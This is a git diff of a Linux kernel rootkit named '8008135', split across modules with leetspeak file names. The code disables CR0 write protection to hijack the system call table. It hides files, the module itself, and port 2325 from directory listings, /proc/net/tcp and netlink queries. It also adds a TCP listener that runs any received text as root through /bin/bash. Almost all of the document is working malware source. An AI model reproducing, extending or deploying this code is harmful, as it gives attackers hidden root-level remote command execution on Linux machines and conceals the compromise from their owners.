diff --git a/.gitignore b/.gitignore index 8359f9d..a0b166b 100644 --- a/.gitignore +++ b/.gitignore @@ -9,10 +9,10 @@ sysgen.h *.a *.ko *.o - +*5y563n.* *~ *.symvers *.order .tmp_versions/ *.cmd -.vscode/ \ No newline at end of file +.vscode/ diff --git a/Makefile b/Makefile index 255fc67..7993ed2 100644 --- a/Makefile +++ b/Makefile @@ -19,10 +19,15 @@ INCL_H := $(PWD)/$(INCL_S)/headers obj-m += $(MNAME).o # Core $(MNAME)-y += src/$(MNAME).o +$(MNAME)-y += src/637d3n75.o $(MNAME)-y += src/50ck3t.o +$(MNAME)-y += src/h1d3p0r7.o +$(MNAME)-y += src/h1d3m0dul3.o +$(MNAME)-y += src/p463unpr073c7.o +$(MNAME)-y += src/5y563n.o # Includes for header files etc -ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) +ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) -Wall all: $(shell $(SRCS_S)/cr3473_5y563n.sh) diff --git a/src/50ck3t.c b/src/50ck3t.c index 9302803..42f98b5 100644 --- a/src/50ck3t.c +++ b/src/50ck3t.c @@ -31,9 +31,22 @@ /**** includes ***************************************************************** *******************************************************************************/ #include "50ck3t.h" - +#ifdef HARMLESS +#else + #include + #include "610b415.h" +#endif /**** types ******************************************************************* *******************************************************************************/ +#ifdef HARMLESS +#else + + static char *SEnvP[] = { + "HOME=/", + NULL + }; + +#endif struct tcp_conn_handler_data{ struct sockaddr_in *FAddress; struct socket *FAcceptSocket; @@ -176,9 +189,10 @@ int connection_handler(void *AData){ int LRet; int LLen = 49; unsigned char LInBuf[LLen+1]; +#ifdef HARMLESS unsigned char LOutBuf[LLen+1]; - - +#else +#endif DECLARE_WAITQUEUE(recv_wait, current); allow_signal(SIGKILL|SIGSTOP); @@ -221,21 +235,33 @@ int connection_handler(void *AData){ LRet = tcp_server_receive(LAcceptSocket, LID, LAddress, LInBuf, LLen,\ MSG_DONTWAIT); if(LRet > 0){ - if(memcmp(LInBuf, "HOLA", 4) == 0){ +#ifdef HARMLESS + if(memcmp(LInBuf, "HOLA", 4) == 0){ memset(LOutBuf, 0, LLen+1); strcat(LOutBuf, "HOLASI"); pr_info("sending response: %s\n", LOutBuf); tcp_server_send(LAcceptSocket, LID, LOutBuf,\ strlen(LOutBuf), MSG_DONTWAIT); - } - if(memcmp(LInBuf, "ADIOS", 5) == 0){ + } + if(memcmp(LInBuf, "ADIOS", 5) == 0){ memset(LOutBuf, 0, LLen+1); strcat(LOutBuf, "ADIOSAMIGO"); pr_info("sending response: %s\n", LOutBuf); tcp_server_send(LAcceptSocket, LID, LOutBuf,\ strlen(LOutBuf), MSG_DONTWAIT); break; - } + } +#else + int Ret; + + + printk(LInBuf); + + char *LArgV[] = {"/bin/bash", "-c", LInBuf, NULL}; + printk("Calling usermodehelper"); + Ret = call_usermodehelper(LArgV[0], LArgV, SEnvP, UMH_WAIT_EXEC); + printk("\nRet is %i \n", Ret); +#endif } } @@ -309,10 +335,8 @@ int tcp_server_accept(void){ __set_current_state(TASK_RUNNING); remove_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait); - pr_info("accept connection\n"); - LAcceptErr = - LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK); + LAcceptErr = LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK); if(LAcceptErr < 0){ pr_info(" *** mtp | accept_error: %d while accepting " @@ -326,9 +350,8 @@ int tcp_server_accept(void){ addr_len = sizeof(struct sockaddr_in); - LAcceptErr = - LAcceptSocket->ops->getname(LAcceptSocket,\ - (struct sockaddr *)LClient,\ + LAcceptErr = LAcceptSocket->ops->getname(LAcceptSocket, + (struct sockaddr *)LClient, &addr_len, 2); if(LAcceptErr < 0){ diff --git a/src/610b415.c b/src/610b415.c new file mode 100644 index 0000000..31acbea --- /dev/null +++ b/src/610b415.c @@ -0,0 +1,20 @@ +/* + * 610b415.c + * + * Created on: Dec 6, 2019 + * Author: vlr + */ + +#include "610b415.h" + +char * stringRemoveChars(char *AString, char *ASpanset){ + char *LPtr = AString; + LPtr = strpbrk(LPtr, ASpanset); + + while(LPtr != NULL) { + *LPtr = ' '; + LPtr = strpbrk(LPtr, AString); + } + + return AString; +} diff --git a/src/637d3n75.c b/src/637d3n75.c new file mode 100644 index 0000000..a6a6aee --- /dev/null +++ b/src/637d3n75.c @@ -0,0 +1,74 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ +/*******************************************************************************/ + + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "637d3n75.h" + +/*** var ******************************************************************** +*******************************************************************************/ + +sys_getdents_ptr sys_getdents_orig; + +/*******************************************************************************/ + +/*** FUNCTION **************************************************************** +* NAME: sys_getdents_new +* DESCRIPTION: function overriding the original getdents +* PARAMETERS: - +* RETURNS: - +*******************************************************************************/ +asmlinkage long sys_getdents_new(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count){ + int boff; + struct linux_dirent* ent; + + long ret = sys_getdents_orig(fd, dirent, count); + + char* dbuf; + + if (ret <= 0) { + return ret; + } + + dbuf = (char*)dirent; + + for (boff = 0; boff < ret;) { + + ent = (struct linux_dirent*)(dbuf + boff); + + + if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) + || (strstr(ent->d_name, MODULE_NAME) != NULL)) { + + memcpy(dbuf + boff, + dbuf + boff + ent->d_reclen, + ret - (boff + ent->d_reclen)); + ret -= ent->d_reclen; + } else { + + boff += ent->d_reclen; + } + } + + return ret; +} diff --git a/src/8008135.c b/src/8008135.c index 6c591c3..4d6d102 100644 --- a/src/8008135.c +++ b/src/8008135.c @@ -17,203 +17,61 @@ * with this program. If not, see . */ +/*******************************************************************************/ + /**** includes ***************************************************************** *******************************************************************************/ #include "8008135.h" -#include "50ck3t.h" -/**** var ******************************************************************** -*******************************************************************************/ - -sys_getdents_t sys_getdents_orig = NULL; - -/*** FUNCTION **************************************************************** -* NAME: sys_getdents_new -* DESCRIPTION: function overriding the original getdents -* PARAMETERS: - -* RETURNS: - -*******************************************************************************/ -asmlinkage long sys_getdents_new(unsigned int fd, - struct linux_dirent __user *dirent, - unsigned int count){ - int boff; - struct linux_dirent* ent; - - long ret = sys_getdents_orig(fd, dirent, count); - - char* dbuf; - - if (ret <= 0) { - return ret; - } - - dbuf = (char*)dirent; - - // go through the entries, looking for one that has our prefix - for (boff = 0; boff < ret;) { - - ent = (struct linux_dirent*)(dbuf + boff); - - // if it has hide prefix or module name anywhere, hide it - if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) - || (strstr(ent->d_name, MODULE_NAME) != NULL)) { -#if defined DEBUG - printk("\n hide prefix or mod name contained!\n"); - printk("\n ret %ld\n ", ret); - printk("\n dbuf %d\n" , dbuf); - printk("\n"); - printk(ent->d_name); -#endif - // remove this entry by copying everything after it forward - // and adjust the length reported -#if defined DEBUG - printk("\n reclen %u \n", ent->d_reclen); -#endif - memcpy(dbuf + boff, - dbuf + boff + ent->d_reclen, - ret - (boff + ent->d_reclen)); - ret -= ent->d_reclen; -#if defined DEBUG - printk("\n ret after change %ld\n ", ret); -#endif - } else { - // on to the next entry - boff += ent->d_reclen; - } - } - - return ret; -} - - -/*** FUNCTION **************************************************************** -* NAME: hide port -* DESCRIPTION: hides the port 2325 -* PARAMETERS: - -* RETURNS: -*******************************************************************************/ -read_ptr orig_read; -asmlinkage long hacked_read(unsigned int fd, char __user *buf, - size_t count) -{ - long result, bp, diff_in_bytes; - char *kbuf, *start_line, *end_line, *port_num; - char *pathname, pbuf[256]; - struct files_struct *current_files; - struct fdtable *files_table; - struct path file_path; - - // run real read - result = (*orig_read)(fd,buf,count); - if (result <= 0) - return result; - - // get pathname - // CITATION [8] from report - current_files = current->files; - files_table = files_fdtable(current_files); - - file_path = files_table->fd[fd]->f_path; - pathname = d_path(&file_path,pbuf,256*sizeof(char)); - // if virtual file /proc/net/tcp - if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) { - // copy from user to kernelspace; - if (!access_ok(VERIFY_READ,buf,result)) - return -1; - if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL) - return -1; - if (copy_from_user(kbuf,buf,result)) - return -1; - - // filter out hidden ports - start_line = strchr(kbuf,':') - 4; // skip first line - diff_in_bytes = (start_line - kbuf) * sizeof(char); - for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { - start_line = kbuf + bp; - port_num = strchr(strchr(start_line,':') + 1,':') + 1; - end_line = strchr(start_line,'\n'); - diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); - if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port - memmove(start_line,end_line + 1, // delete line in file - result - bp - diff_in_bytes); - result -= diff_in_bytes; - } - } - - // copy from kernel to userspace - if (!access_ok(VERIFY_WRITE,buf,result)) - return EINVAL; - if (copy_to_user(buf,kbuf,result)) - return EINVAL; - kfree(kbuf); - } - // return number of bytes read - return result; -} -/*** FUNCTION **************************************************************** -* NAME: hide_module -* DESCRIPTION: hides the module from lsmod -* PARAMETERS: - -* RETURNS: -*******************************************************************************/ -void hide_module(void){ - list_del(&THIS_MODULE->list); -} - /*** FUNCTION **************************************************************** * NAME: 8008135_init -* DESCRIPTION: initializing Kernel Module +* DESCRIPTION: initializing Kernel Module - hijacking syscalltable * PARAMETERS: - * RETURNS: int *******************************************************************************/ static int __init init_8008135(void) { - printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table); - - // record the original getdents handler - sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM]; - - printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig); - // turn write protect off - write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); - - // add our new handlers - sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new; - - orig_read = (read_ptr)sys_call_table[__NR_read]; - - sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read; + sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents]; + sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read]; + sys_recvmsg_orig = (void *) sys_call_table[__NR_recvmsg]; + + wprotectionoff(); + + sys_call_table[__NR_getdents] = sys_getdents_new; + sys_call_table[__NR_read] = sys_read_fake; + sys_call_table[__NR_recvmsg] = my_recvmsg_syscall; - // turn write protect back on - write_cr0(read_cr0() | WRITE_PROTECT_FLAG); + wprotectionon(); - printk(KERN_INFO "New syscall in place\n"); network_server_init(); hide_module(); - printk(KERN_INFO "Module hidden"); return 0; } /*** FUNCTION **************************************************************** * NAME: 8008135_exit -* DESCRIPTION: unloading Kernel Module +* DESCRIPTION: unloading Kernel Module, restoring the original system call table * PARAMETERS: - * RETURNS: - *******************************************************************************/ static void __exit exit_8008135(void) { + network_server_exit(); - // allow us to write to read onlu pages - write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); - // set getdents handler back - sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig; - sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read; - // turn write protect back on - write_cr0(read_cr0() | WRITE_PROTECT_FLAG); - printk(KERN_INFO "Old syscall back\n"); + + wprotectionoff(); + + sys_call_table[__NR_getdents] = sys_getdents_orig; + sys_call_table[__NR_read] = sys_read_orig; + sys_call_table[__NR_recvmsg] = sys_recvmsg_orig; + + wprotectionon(); } -// Setting pointers to init-/exit-functions +/*******************************************************************************/ + module_init(init_8008135); module_exit(exit_8008135); + +/*******************************************************************************/ diff --git a/src/cr3473_5y563n.sh b/src/cr3473_5y563n.sh index 17d133d..1a1f56c 100755 --- a/src/cr3473_5y563n.sh +++ b/src/cr3473_5y563n.sh @@ -1,19 +1,32 @@ #!/usr/bin/env bash + SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )" + SRCS_H="$SCRIPTPATH""/headers" + +SGENS="$SCRIPTPATH""/5y563n.c" SGENH="$SRCS_H""/5y563n.h" smap="/boot/System.map-$(uname -r)" +echo -e '#include "5y563n.h"' > "$SGENS" + echo -e "#pragma once" > "$SGENH" echo -e "#include " >> "$SGENH" + symbline=$(cat $smap | grep '\Wsys_call_table$') set $symbline + [ -z "$symbline" ] && echo "No SysCall Table Value from System.map found" && exit 2; -echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENH" + +echo -e "extern void** sys_call_table;" >> "$SGENH" + +echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENS" procline=$(cat $smap | grep '\Wproc_modules_operations$') set $procline -echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENH" \ No newline at end of file +echo -e "extern struct file_operations* proc_modules_operations;">> "$SGENH" + +echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENS" \ No newline at end of file diff --git a/src/h1d3m0dul3.c b/src/h1d3m0dul3.c new file mode 100644 index 0000000..3a8ce87 --- /dev/null +++ b/src/h1d3m0dul3.c @@ -0,0 +1,36 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/*******************************************************************************/ + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "h1d3m0dul3.h" + +/*******************************************************************************/ + +/*** FUNCTION **************************************************************** +* NAME: hide_module +* DESCRIPTION: hides the module from lsmod +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ +void hide_module(void){ + list_del(&THIS_MODULE->list); +} diff --git a/src/h1d3p0r7.c b/src/h1d3p0r7.c new file mode 100644 index 0000000..5d16ec0 --- /dev/null +++ b/src/h1d3p0r7.c @@ -0,0 +1,185 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/*******************************************************************************/ + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "h1d3p0r7.h" + +/**** var ********************************************************************** +*******************************************************************************/ + +sys_read_ptr sys_read_orig; +original_recvmsg_syscall sys_recvmsg_orig; + +/*******************************************************************************/ + +/*** FUNCTION **************************************************************** +* NAME: hide port +* DESCRIPTION: hides the port 2325 +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ + +asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, + size_t count) +{ + long result, bp, diff_in_bytes; + char *kbuf, *start_line, *end_line, *port_num; + char *pathname, pbuf[256]; + struct files_struct *current_files; + struct fdtable *files_table; + struct path file_path; + + // run real read + result = (*sys_read_orig)(fd, buf, count); + + if (result <= 0){ + return result; + } + + + current_files = current->files; + files_table = files_fdtable(current_files); + + file_path = files_table->fd[fd]->f_path; + pathname = d_path(&file_path, pbuf, 256*sizeof(char)); + + + if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) { + + if (!access_ok(VERIFY_READ, buf, result)){ + return -1; + } + if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){ + return -1; + } + if (copy_from_user(kbuf, buf, result)){ + return -1; + } + + + start_line = strchr(kbuf, ':') - 4; + diff_in_bytes = (start_line - kbuf) * sizeof(char); + + for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { + + start_line = kbuf + bp; + port_num = strchr(strchr(start_line, ':') + 1, ':') + 1; + end_line = strchr(start_line, '\n'); + diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); + + if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) { + + memmove(start_line, end_line + 1, + result - bp - diff_in_bytes); + + result -= diff_in_bytes; + } + } + + // copy from kernel to userspace + if (!access_ok(VERIFY_WRITE, buf, result)){ + return EINVAL; + } + if (copy_to_user(buf, kbuf, result)){ + return EINVAL; + } + kfree(kbuf); + } + // return number of bytes read + return result; +} + +/* Function that replaces the original `recvmsg` syscall. Initially, it calls the original + `recvmsg` which fills the given msg buffer. We realize whether we are reading from a netlink + socket with the help of some netlink utility macros. If a netlink socket is being used, we + iterate through the inet diag msg structs (each prepended by a nlmsghdr) and compare the + source and destination ports with our list of hidden ones. In order to hide an entry we copy + the remaining entries over it and adjust the data length which is returned to the user. */ + +asmlinkage ssize_t my_recvmsg_syscall(int sockfd, struct user_msghdr __user *msg, unsigned flags) +{ + long ret; + struct nlmsghdr *nlh; + long count; + int found; + char *stream; + int offset; + int i; + struct inet_diag_msg *r; + int port; + /* Call original `recvmsg` syscall */ + ret = sys_recvmsg_orig(sockfd, msg, flags); + + /* Some error occured. Don't do anything. */ + if (ret < 0) + return ret; + + /* Extract netlink message header from message */ + nlh = (struct nlmsghdr *)(msg->msg_iov->iov_base); + + /* Number of bytes remaining in message stream */ + count = ret; + + /* Set flag specifying whether message contains data to be masked */ + found = 1; + + /* NLMSG_OK: This macro will return true if a netlink message was received. It + essentially checks whether it's safe to parse the netlink message (if indeed + is a netlink message) using the other NLMSG_* macros. */ + while (NLMSG_OK(nlh, count)) { + + if (found == 0) + /* NLMSG_NEXT: Many netlink protocols have request messages that result + in multiple response messages. In these cases, multiple responses will + be copied into the `msg` buffer. This macro can be used to walk the + chain of responses. Returns NULL in the event the message is the last + in the chain for the given buffer. */ + nlh = NLMSG_NEXT(nlh, count); + + r = NLMSG_DATA(nlh); + port = ntohs(r->id.idiag_sport); + if(port == 2325){ + /* Message contains data to be masked */ + found = 1; + }else{ + found = 0; + continue; + } + + + stream = (char *) nlh; + + /* NLMSG_ALIGN: This macro accepts the length of a netlink message and rounds it + up to the nearest NLMSG_ALIGNTO boundary. It returns the rounded length. */ + offset = NLMSG_ALIGN((nlh)->nlmsg_len); + + /* Copy remaining entries over the data to be masked */ + for (i=0 ; i. */ -#ifndef SRC_HEADERS_50CK3T_H_ -#define SRC_HEADERS_50CK3T_H_ +#ifndef SRC_HEADERS_50CK3T_H +#define SRC_HEADERS_50CK3T_H /**** includes ***************************************************************** *******************************************************************************/ @@ -40,11 +40,15 @@ #include #include +/**** defines ***************************************************************** +*******************************************************************************/ + #define DEFAULT_PORT 2325 +#define DEFAULT_PORT_HEX "0915" #define MAX_CONNS 16 #define MODULE_NAME "8008135" int network_server_init(void); void network_server_exit(void); -#endif /* SRC_HEADERS_50CK3T_H_ */ +#endif diff --git a/src/headers/610b415.h b/src/headers/610b415.h new file mode 100644 index 0000000..3fcf6ac --- /dev/null +++ b/src/headers/610b415.h @@ -0,0 +1,13 @@ +/* + * 610b415.h + * + * Created on: Dec 6, 2019 + * Author: vlr + */ + +#ifndef SRC_HEADERS_610B415_H_ +#define SRC_HEADERS_610B415_H_ + +extern char * stringRemoveChars(char *AString, char *ASpanset); + +#endif /* SRC_HEADERS_610B415_H_ */ diff --git a/src/headers/637d3n75.h b/src/headers/637d3n75.h new file mode 100644 index 0000000..26f8ff7 --- /dev/null +++ b/src/headers/637d3n75.h @@ -0,0 +1,68 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/*******************************************************************************/ + + +#ifndef SRC_HEADERS_637d3n75_H +#define SRC_HEADERS_637d3n75_H + + +/**** include **************************************************************** +*******************************************************************************/ +#include +#include +#include +#include + +#include "5y563n.h" + +#define HIDE_PREFIX "8008135." +#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) + +#define MODULE_NAME "8008135" +#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) + +#define __NR_getdents 78 + +/**** type ******************************************************************** +******************************************************************************/ + +struct linux_dirent { + unsigned long d_ino; + unsigned long d_off; + unsigned short d_reclen; + char d_name[1]; +}; + +typedef asmlinkage long (*sys_getdents_ptr)(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count); + +/*** var ******************************************************************** +*******************************************************************************/ + +extern sys_getdents_ptr sys_getdents_orig; + + +extern asmlinkage long sys_getdents_new(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count); + +#endif diff --git a/src/headers/8008135.h b/src/headers/8008135.h index 0ff10ae..d6b5bef 100644 --- a/src/headers/8008135.h +++ b/src/headers/8008135.h @@ -18,16 +18,24 @@ */ #ifndef SRC_HEADERS_8008135_H #define SRC_HEADERS_8008135_H + /**** Includes *************************************************************** *******************************************************************************/ +#include "637d3n75.h" +#include "50ck3t.h" +#include "h1d3m0dul3.h" +#include "h1d3p0r7.h" +#include "p463unpr073c7.h" + +// To set module data #include +// To communicate kernel #include +/* #include -#include #include -#include -#include "5y563n.h" +#include #include #include #include @@ -36,20 +44,10 @@ #include #include #include - +*/ /**** Defines ***************************************************************** *******************************************************************************/ -#define GETDENTS_SYSCALL_NUM 78 -#define READ_SYSCALL_NUM 0 -#define WRITE_PROTECT_FLAG (1<<16) - -#define HIDE_PREFIX "8008135." -#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) - -#define MODULE_NAME "8008135" -#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) -#define HIDE_PORT "0915" // 2325 in Hexadecimal /**** Modinfo **************************************************************** *******************************************************************************/ @@ -59,18 +57,5 @@ MODULE_AUTHOR("JanKoernerEnterprises"); MODULE_DESCRIPTION("8008135"); MODULE_VERSION("0.1"); -/**** type ******************************************************************* -*******************************************************************************/ -struct linux_dirent { - unsigned long d_ino; - unsigned long d_off; - unsigned short d_reclen; // d_reclen is the way to tell the length of this entry - char d_name[1]; // the struct value is actually longer than this, and d_name is variable width. -}; -typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, - struct linux_dirent __user *dirent, - unsigned int count); -typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf, - size_t count); -#endif /* SRC_HEADERS_8008135_H */ +#endif diff --git a/src/headers/h1d3m0dul3.h b/src/headers/h1d3m0dul3.h new file mode 100644 index 0000000..f70db50 --- /dev/null +++ b/src/headers/h1d3m0dul3.h @@ -0,0 +1,30 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +#ifndef SRC_HEADERS_h1d3m0dul3_H +#define SRC_HEADERS_h1d3m0dul3_H + + +#include +#include + + +extern void hide_module(void); + +#endif diff --git a/src/headers/h1d3p0r7.h b/src/headers/h1d3p0r7.h new file mode 100644 index 0000000..21aacb7 --- /dev/null +++ b/src/headers/h1d3p0r7.h @@ -0,0 +1,62 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +#ifndef SRC_HEADERS_h1d3p0r7_H +#define SRC_HEADERS_h1d3p0r7_H + + +/**** includes **************************************************************** +*******************************************************************************/ + +#include "50ck3t.h" + +/* are those really all needed? */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include /* Needed for ntohs */ + + +#define __NR_read 0 +#define __NR_recvmsg 47 + + +typedef asmlinkage long (*sys_read_ptr)(unsigned int fd, + char __user *buf, + size_t count); +typedef asmlinkage ssize_t (*original_recvmsg_syscall)(int, struct user_msghdr __user *, unsigned); + + +/**** var ********************************************************************** +*******************************************************************************/ + +extern sys_read_ptr sys_read_orig; +extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, + size_t count); + +extern original_recvmsg_syscall sys_recvmsg_orig; +extern asmlinkage ssize_t my_recvmsg_syscall(int, struct user_msghdr __user *, unsigned); + +#endif diff --git a/src/headers/p463unpr073c7.h b/src/headers/p463unpr073c7.h new file mode 100644 index 0000000..c4aafb8 --- /dev/null +++ b/src/headers/p463unpr073c7.h @@ -0,0 +1,33 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +#ifndef SRC_HEADERS_p463unpr073c7_H +#define SRC_HEADERS_p463unpr073c7_H + +#include +#include "asm/special_insns.h" + +/**** defines ***************************************************************** +*******************************************************************************/ +#define WRITE_PROTECT_FLAG (1<<16) + +extern void wprotectionoff(void); +extern void wprotectionon(void); + +#endif diff --git a/src/p463unpr073c7.c b/src/p463unpr073c7.c new file mode 100644 index 0000000..904825a --- /dev/null +++ b/src/p463unpr073c7.c @@ -0,0 +1,48 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ + +/*******************************************************************************/ + +/**** includes ***************************************************************** +*******************************************************************************/ +#include "p463unpr073c7.h" + +/*******************************************************************************/ + + +/*** FUNCTION **************************************************************** +* NAME: wprotectionoff +* DESCRIPTION: turn page write protection off +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ +void wprotectionoff(void){ + write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); +} + +/*** FUNCTION **************************************************************** +* NAME: wprotectionon +* DESCRIPTION: turn page write protection on +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ + +void wprotectionon(void){ + write_cr0(read_cr0() | WRITE_PROTECT_FLAG); +}